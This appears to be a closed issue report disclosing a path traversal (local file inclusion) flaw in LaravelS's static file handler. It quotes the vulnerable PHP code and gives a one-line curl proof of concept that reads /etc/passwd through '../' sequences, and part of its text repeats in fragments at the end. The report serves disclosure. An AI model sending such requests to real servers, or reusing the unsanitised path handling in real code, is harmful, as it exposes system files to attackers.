Closed zhazhami closed 1 year ago
Your software version (Screenshot of your startup)
Detail description about this issue(error/log)
When the settings "handle_static" is true, LaravelS is affected by a LFI vulnerability.
vulnerable file: /src/Illuminate/Laravel.php
public function handleStatic(IlluminateRequest $request) { $uri = $request->getRequestUri(); if (isset(self::$staticBlackList[$uri])) { return false; } $uri = (string)str_replace("\0", '', urldecode($uri)); $requestFile = $this->conf['static_path'] . $uri; if (is_file($requestFile)) { return $this->createStaticResponse($requestFile, $request); } ...
Some reproducible code blocks and steps vulnerability poc
reproducible
steps
curl --path-as-is "http://127.0.0.1:5200/../../../../../../etc/passwd"
Thanks.
Your software version (Screenshot of your startup)
Detail description about this issue(error/log)
When the settings "handle_static" is true, LaravelS is affected by a LFI vulnerability.
vulnerable file: /src/Illuminate/Laravel.php
Some
reproducible
code blocks andsteps
vulnerability poc